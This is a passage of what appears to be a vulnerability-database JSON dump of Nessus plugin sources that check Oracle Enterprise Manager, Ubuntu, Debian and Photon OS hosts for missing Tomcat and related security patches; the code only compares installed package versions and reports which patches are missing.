(CVE-2018-8039)\n\n - An unspecified vulnerability in the Oracle Enterprise Manager Base Platform component\n of Oracle Enterprise Manager Products Suite (subcomponent: Valid Session (Apache ActiveMQ)),\n which could allow an unauthenticated, remote attacker to compromise\n Oracle Enterprise Manager Base Platform. (CVE-2019-0222)\n\n - An unspecified vulnerability in the Enterprise Manager Base Platform component of\n Oracle Enterprise Manager Products Suite (subcomponent: Discovery Framework (OpenSSL)), which\n could allow an unauthenticated, remote attacker to compromise\n Enterprise Manager Base Platform. (CVE-2019-1559)\");\n # https://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?9aa2b901\");\n # https://support.oracle.com/rs?type=doc&id=2534806.1\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?88632d22\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the appropriate patch according to the July 2019\nOracle Critical Patch Update advisory.\");\n script_set_attribute(attribute:\"agent\", value:\"all\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-8039\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2018-1258\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/07/16\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/07/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/07/17\");\n\n 
script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:enterprise_manager\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"oracle_enterprise_manager_installed.nbin\");\n script_require_keys(\"installed_sw/Oracle Enterprise Manager Cloud Control\");\n\n exit(0);\n}\n\ninclude('global_settings.inc');\ninclude('misc_func.inc');\ninclude('oracle_rdbms_cpu_func.inc');\ninclude('install_func.inc');\n\nproduct = 'Oracle Enterprise Manager Cloud Control';\ninstall = get_single_install(app_name:product, exit_if_unknown_ver:TRUE);\nversion = install['version'];\nemchome = install['path'];\n\npatchid = NULL;\nmissing = NULL;\npatched = FALSE;\nfix = NULL;\n\nif (version =~ '^13\\\\.3\\\\.0\\\\.0(\\\\.[0-9]+)?$')\n{\n patchid = '29835547';\n fix = '13.3.0.0.190716';\n}\nelse if (version =~ '^13\\\\.2\\\\.0\\\\.0(\\\\.[0-9]+)?$')\n{\n patchid = '29835501';\n fix = '13.2.0.0.190716';\n}\nelse if (version =~ '^12\\\\.1\\\\.0\\\\.5(\\\\.[0-9]+)?$')\n{\n patchid = '29835388';\n fix = '12.1.0.5.190716';\n}\n\nif (isnull(patchid))\n audit(AUDIT_HOST_NOT, 'affected');\n\n# compare version to check if we've already adjusted for patch level during detection\nif (ver_compare(ver:version, fix:fix, strict:FALSE) >= 0)\n audit(AUDIT_INST_PATH_NOT_VULN, product, version, emchome);\n\n# Now look for the affected components\npatchesinstalled = find_patches_in_ohomes(ohomes:make_list(emchome));\nif (isnull(patchesinstalled))\n missing = patchid;\nelse\n{\n foreach applied (keys(patchesinstalled[emchome]))\n {\n if (applied == patchid)\n {\n patched = TRUE;\n break;\n }\n else\n 
{\n foreach bugid (patchesinstalled[emchome][applied]['bugs'])\n {\n if (bugid == patchid)\n {\n patched = TRUE;\n break;\n }\n }\n if (patched) break;\n }\n }\n if (!patched)\n missing = patchid;\n}\n\nif (empty_or_null(missing))\n audit(AUDIT_HOST_NOT, 'affected');\n\norder = make_list('Product', 'Version', 'Missing patch');\nreport = make_array(\n order[0], product,\n order[1], version,\n order[2], patchid\n);\nreport = report_items_str(report_items:report, ordered_fields:order);\n\nsecurity_report_v4(port:0, extra:report, severity:SECURITY_WARNING);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-11-29T15:39:40", "description": "It was discovered that Tomcat incorrectly handled being configured with HTTP PUTs enabled. A remote attacker could use this issue to upload a JSP file to the server and execute arbitrary code. This issue only affected Ubuntu 14.04 LTS, Ubuntu 16.04 LTS and Ubuntu 17.10.\n(CVE-2017-12616, CVE-2017-12617)\n\nIt was discovered that Tomcat contained incorrect documentation regarding description of the search algorithm used by the CGI Servlet to identify which script to execute. This issue only affected Ubuntu 17.10. (CVE-2017-15706)\n\nIt was discovered that Tomcat incorrectly handled an empty string URL pattern in security constraint definitions. A remote attacker could possibly use this issue to gain access to web application resources, contrary to expectations. This issue only affected Ubuntu 14.04 LTS, Ubuntu 16.04 LTS and Ubuntu 17.10. (CVE-2018-1304)\n\nIt was discovered that Tomcat incorrectly handled applying certain security constraints. A remote attacker could possibly access certain resources, contrary to expectations. This issue only affected Ubuntu 14.04 LTS, Ubuntu 16.04 LTS and Ubuntu 17.10. (CVE-2018-1305)\n\nIt was discovered that the Tomcat CORS filter default settings were insecure and would enable 'supportsCredentials' for all origins, contrary to expectations. 
(CVE-2018-8014).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2018-05-31T00:00:00", "type": "nessus", "title": "Ubuntu 14.04 LTS / 16.04 LTS / 18.04 LTS : Tomcat vulnerabilities (USN-3665-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-12616", "CVE-2017-12617", "CVE-2017-15706", "CVE-2018-1304", "CVE-2018-1305", "CVE-2018-8014"], "modified": "2023-10-20T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:libtomcat7-java", "p-cpe:/a:canonical:ubuntu_linux:libtomcat8-embed-java", "p-cpe:/a:canonical:ubuntu_linux:libtomcat8-java", "p-cpe:/a:canonical:ubuntu_linux:tomcat7", "p-cpe:/a:canonical:ubuntu_linux:tomcat7-admin", "p-cpe:/a:canonical:ubuntu_linux:tomcat7-common", "p-cpe:/a:canonical:ubuntu_linux:tomcat7-examples", "p-cpe:/a:canonical:ubuntu_linux:tomcat7-user", "p-cpe:/a:canonical:ubuntu_linux:tomcat8", "p-cpe:/a:canonical:ubuntu_linux:tomcat8-admin", "p-cpe:/a:canonical:ubuntu_linux:tomcat8-common", "p-cpe:/a:canonical:ubuntu_linux:tomcat8-examples", "p-cpe:/a:canonical:ubuntu_linux:tomcat8-user", "cpe:/o:canonical:ubuntu_linux:14.04:-:lts", "cpe:/o:canonical:ubuntu_linux:16.04:-:lts", "cpe:/o:canonical:ubuntu_linux:18.04:-:lts", "p-cpe:/a:canonical:ubuntu_linux:libservlet3.0-java", "p-cpe:/a:canonical:ubuntu_linux:libservlet3.1-java"], "id": "UBUNTU_USN-3665-1.NASL", "href": "https://www.tenable.com/plugins/nessus/110264", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-3665-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. 
Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(110264);\n script_version(\"1.22\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/10/20\");\n\n script_cve_id(\n \"CVE-2017-12616\",\n \"CVE-2017-12617\",\n \"CVE-2017-15706\",\n \"CVE-2018-1304\",\n \"CVE-2018-1305\",\n \"CVE-2018-8014\"\n );\n script_xref(name:\"USN\", value:\"3665-1\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/15\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0240\");\n\n script_name(english:\"Ubuntu 14.04 LTS / 16.04 LTS / 18.04 LTS : Tomcat vulnerabilities (USN-3665-1)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Ubuntu host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"It was discovered that Tomcat incorrectly handled being configured\nwith HTTP PUTs enabled. A remote attacker could use this issue to\nupload a JSP file to the server and execute arbitrary code. This issue\nonly affected Ubuntu 14.04 LTS, Ubuntu 16.04 LTS and Ubuntu 17.10.\n(CVE-2017-12616, CVE-2017-12617)\n\nIt was discovered that Tomcat contained incorrect documentation\nregarding description of the search algorithm used by the CGI Servlet\nto identify which script to execute. This issue only affected Ubuntu\n17.10. (CVE-2017-15706)\n\nIt was discovered that Tomcat incorrectly handled an empty string URL\npattern in security constraint definitions. A remote attacker could\npossibly use this issue to gain access to web application resources,\ncontrary to expectations. This issue only affected Ubuntu 14.04 LTS,\nUbuntu 16.04 LTS and Ubuntu 17.10. (CVE-2018-1304)\n\nIt was discovered that Tomcat incorrectly handled applying certain\nsecurity constraints. A remote attacker could possibly access certain\nresources, contrary to expectations. 
This issue only affected Ubuntu\n14.04 LTS, Ubuntu 16.04 LTS and Ubuntu 17.10. (CVE-2018-1305)\n\nIt was discovered that the Tomcat CORS filter default settings were\ninsecure and would enable 'supportsCredentials' for all origins,\ncontrary to expectations. (CVE-2018-8014).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://ubuntu.com/security/notices/USN-3665-1\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-8014\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Apache Tomcat VirtualDirContext Class File Handling Remote JSP Source Code Disclosure\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Tomcat RCE via JSP Upload Bypass');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/09/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/05/30\");\n 
script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/05/31\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libtomcat7-java\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libtomcat8-embed-java\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libtomcat8-java\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:tomcat7\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:tomcat7-admin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:tomcat7-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:tomcat7-examples\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:tomcat7-user\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:tomcat8\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:tomcat8-admin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:tomcat8-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:tomcat8-examples\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:tomcat8-user\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:14.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:16.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:18.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libservlet3.0-java\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libservlet3.1-java\");\n 
script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_copyright(english:\"Ubuntu Security Notice (C) 2018-2023 Canonical, Inc. / NASL script (C) 2018-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\ninclude('debian_package.inc');\n\nif ( ! get_kb_item('Host/local_checks_enabled') ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nvar os_release = get_kb_item('Host/Ubuntu/release');\nif ( isnull(os_release) ) audit(AUDIT_OS_NOT, 'Ubuntu');\nos_release = chomp(os_release);\nif (! ('14.04' >< os_release || '16.04' >< os_release || '18.04' >< os_release)) audit(AUDIT_OS_NOT, 'Ubuntu 14.04 / 16.04 / 18.04', 'Ubuntu ' + os_release);\nif ( ! get_kb_item('Host/Debian/dpkg-l') ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Ubuntu', cpu);\n\nvar pkgs = [\n {'osver': '14.04', 'pkgname': 'libservlet3.0-java', 'pkgver': '7.0.52-1ubuntu0.14'},\n {'osver': '14.04', 'pkgname': 'libtomcat7-java', 'pkgver': '7.0.52-1ubuntu0.14'},\n {'osver': '14.04', 'pkgname': 'tomcat7', 'pkgver': '7.0.52-1ubuntu0.14'},\n {'osver': '14.04', 'pkgname': 'tomcat7-admin', 'pkgver': '7.0.52-1ubuntu0.14'},\n {'osver': '14.04', 'pkgname': 'tomcat7-common', 'pkgver': '7.0.52-1ubuntu0.14'},\n {'osver': '14.04', 'pkgname': 'tomcat7-examples', 'pkgver': '7.0.52-1ubuntu0.14'},\n {'osver': '14.04', 'pkgname': 'tomcat7-user', 'pkgver': '7.0.52-1ubuntu0.14'},\n {'osver': '16.04', 'pkgname': 'libservlet3.1-java', 'pkgver': '8.0.32-1ubuntu1.6'},\n {'osver': '16.04', 'pkgname': 
'libtomcat8-java', 'pkgver': '8.0.32-1ubuntu1.6'},\n {'osver': '16.04', 'pkgname': 'tomcat8', 'pkgver': '8.0.32-1ubuntu1.6'},\n {'osver': '16.04', 'pkgname': 'tomcat8-admin', 'pkgver': '8.0.32-1ubuntu1.6'},\n {'osver': '16.04', 'pkgname': 'tomcat8-common', 'pkgver': '8.0.32-1ubuntu1.6'},\n {'osver': '16.04', 'pkgname': 'tomcat8-examples', 'pkgver': '8.0.32-1ubuntu1.6'},\n {'osver': '16.04', 'pkgname': 'tomcat8-user', 'pkgver': '8.0.32-1ubuntu1.6'},\n {'osver': '18.04', 'pkgname': 'libservlet3.1-java', 'pkgver': '8.5.30-1ubuntu1.2'},\n {'osver': '18.04', 'pkgname': 'libtomcat8-embed-java', 'pkgver': '8.5.30-1ubuntu1.2'},\n {'osver': '18.04', 'pkgname': 'libtomcat8-java', 'pkgver': '8.5.30-1ubuntu1.2'},\n {'osver': '18.04', 'pkgname': 'tomcat8', 'pkgver': '8.5.30-1ubuntu1.2'},\n {'osver': '18.04', 'pkgname': 'tomcat8-admin', 'pkgver': '8.5.30-1ubuntu1.2'},\n {'osver': '18.04', 'pkgname': 'tomcat8-common', 'pkgver': '8.5.30-1ubuntu1.2'},\n {'osver': '18.04', 'pkgname': 'tomcat8-examples', 'pkgver': '8.5.30-1ubuntu1.2'},\n {'osver': '18.04', 'pkgname': 'tomcat8-user', 'pkgver': '8.5.30-1ubuntu1.2'}\n];\n\nvar flag = 0;\nforeach package_array ( pkgs ) {\n var osver = NULL;\n var pkgname = NULL;\n var pkgver = NULL;\n if (!empty_or_null(package_array['osver'])) osver = package_array['osver'];\n if (!empty_or_null(package_array['pkgname'])) pkgname = package_array['pkgname'];\n if (!empty_or_null(package_array['pkgver'])) pkgver = package_array['pkgver'];\n if (osver && pkgname && pkgver) {\n if (ubuntu_check(osver:osver, pkgname:pkgname, pkgver:pkgver)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'libservlet3.0-java / libservlet3.1-java / libtomcat7-java / etc');\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": 
"2023-05-25T14:32:05", "description": "Several issues were discovered in the Tomcat servlet and JSP engine, which could result in session fixation attacks, information disclosure, cross-site scripting, denial of service via resource exhaustion and insecure redirects.", "cvss3": {}, "published": "2019-12-30T00:00:00", "type": "nessus", "title": "Debian DSA-4596-1 : tomcat8 - security update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-11784", "CVE-2018-8014", "CVE-2019-0199", "CVE-2019-0221", "CVE-2019-12418", "CVE-2019-17563"], "modified": "2023-02-23T00:00:00", "cpe": ["cpe:/o:debian:debian_linux:9.0", "p-cpe:/a:debian:debian_linux:tomcat8"], "id": "DEBIAN_DSA-4596.NASL", "href": "https://www.tenable.com/plugins/nessus/132427", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-4596. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(132427);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/02/23\");\n\n script_cve_id(\"CVE-2018-11784\", \"CVE-2018-8014\", \"CVE-2019-0199\", \"CVE-2019-0221\", \"CVE-2019-12418\", \"CVE-2019-17563\");\n script_xref(name:\"DSA\", value:\"4596\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0004\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0025\");\n\n script_name(english:\"Debian DSA-4596-1 : tomcat8 - security update\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"Several issues were discovered in the Tomcat servlet and JSP engine,\nwhich could result in session fixation attacks, information\ndisclosure, cross-site 
scripting, denial of service via resource\nexhaustion and insecure redirects.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/source-package/tomcat8\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/stretch/tomcat8\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2019/dsa-4596\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"Upgrade the tomcat8 packages.\n\nFor the oldstable distribution (stretch), these problems have been\nfixed in version 8.5.50-0+deb9u1. This update also requires an updated\nversion of tomcat-native which has been updated to 1.2.21-1~deb9u1.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-8014\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:tomcat8\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:9.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/05/16\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/12/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/12/30\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n 
script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"9.0\", prefix:\"libservlet3.1-java\", reference:\"8.5.50-0+deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"libservlet3.1-java-doc\", reference:\"8.5.50-0+deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"libtomcat8-embed-java\", reference:\"8.5.50-0+deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"libtomcat8-java\", reference:\"8.5.50-0+deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"tomcat8\", reference:\"8.5.50-0+deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"tomcat8-admin\", reference:\"8.5.50-0+deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"tomcat8-common\", reference:\"8.5.50-0+deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"tomcat8-docs\", reference:\"8.5.50-0+deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"tomcat8-examples\", reference:\"8.5.50-0+deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"tomcat8-user\", reference:\"8.5.50-0+deb9u1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-20T14:39:58", "description": "An update of 
'apache-tomcat', 'binutils' packages of Photon OS has been released.", "cvss3": {}, "published": "2018-08-17T00:00:00", "type": "nessus", "title": "Photon OS 1.0: Apache / Binutils PHSA-2018-1.0-0154 (deprecated)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-10372", "CVE-2018-10535", "CVE-2018-6759", "CVE-2018-6872", "CVE-2018-7568", "CVE-2018-7569", "CVE-2018-7642", "CVE-2018-8014", "CVE-2018-8945"], "modified": "2019-02-07T00:00:00", "cpe": ["p-cpe:/a:vmware:photonos:apache", "p-cpe:/a:vmware:photonos:binutils", "cpe:/o:vmware:photonos:1.0"], "id": "PHOTONOS_PHSA-2018-1_0-0154.NASL", "href": "https://www.tenable.com/plugins/nessus/111938", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# @DEPRECATED@\n#\n# Disabled on 2/7/2019\n#\n\n# The descriptive text and package checks in this plugin were\n# extracted from VMware Security Advisory PHSA-2018-1.0-0154. The text\n# itself is copyright (C) VMware, Inc.\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(111938);\n script_version(\"1.2\");\n script_cvs_date(\"Date: 2019/02/07 18:59:50\");\n\n script_cve_id(\n \"CVE-2018-6759\",\n \"CVE-2018-6872\",\n \"CVE-2018-7568\",\n \"CVE-2018-7569\",\n \"CVE-2018-7642\",\n \"CVE-2018-8014\",\n \"CVE-2018-8945\",\n \"CVE-2018-10372\",\n \"CVE-2018-10535\"\n );\n\n script_name(english:\"Photon OS 1.0: Apache / Binutils PHSA-2018-1.0-0154 (deprecated)\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"This plugin has been deprecated.\");\n script_set_attribute(attribute:\"description\", value:\n\"An update of 'apache-tomcat', 'binutils' packages of Photon OS has\nbeen released.\");\n # https://github.com/vmware/photon/wiki/Security-Updates-1.0-154\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?62848874\");\n script_set_attribute(attribute:\"solution\", value:\"n/a.\");\n 
script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-8014\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/06/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/08/17\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:vmware:photonos:apache\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:vmware:photonos:binutils\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:photonos:1.0\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"PhotonOS Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/PhotonOS/release\", \"Host/PhotonOS/rpm-list\");\n\n exit(0);\n}\n\nexit(0, \"This plugin has been deprecated.\");\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/PhotonOS/release\");\nif (isnull(release) || release !~ \"^VMware Photon\") audit(AUDIT_OS_NOT, \"PhotonOS\");\nif (release !~ \"^VMware Photon (?:Linux|OS) 1\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"PhotonOS 1.0\");\n\nif (!get_kb_item(\"Host/PhotonOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"PhotonOS\", cpu);\n\nflag = 0;\n\npkgs = [\n \"apache-tomcat-8.5.31-2.ph1\",\n \"binutils-2.30-5.ph1\",\n 
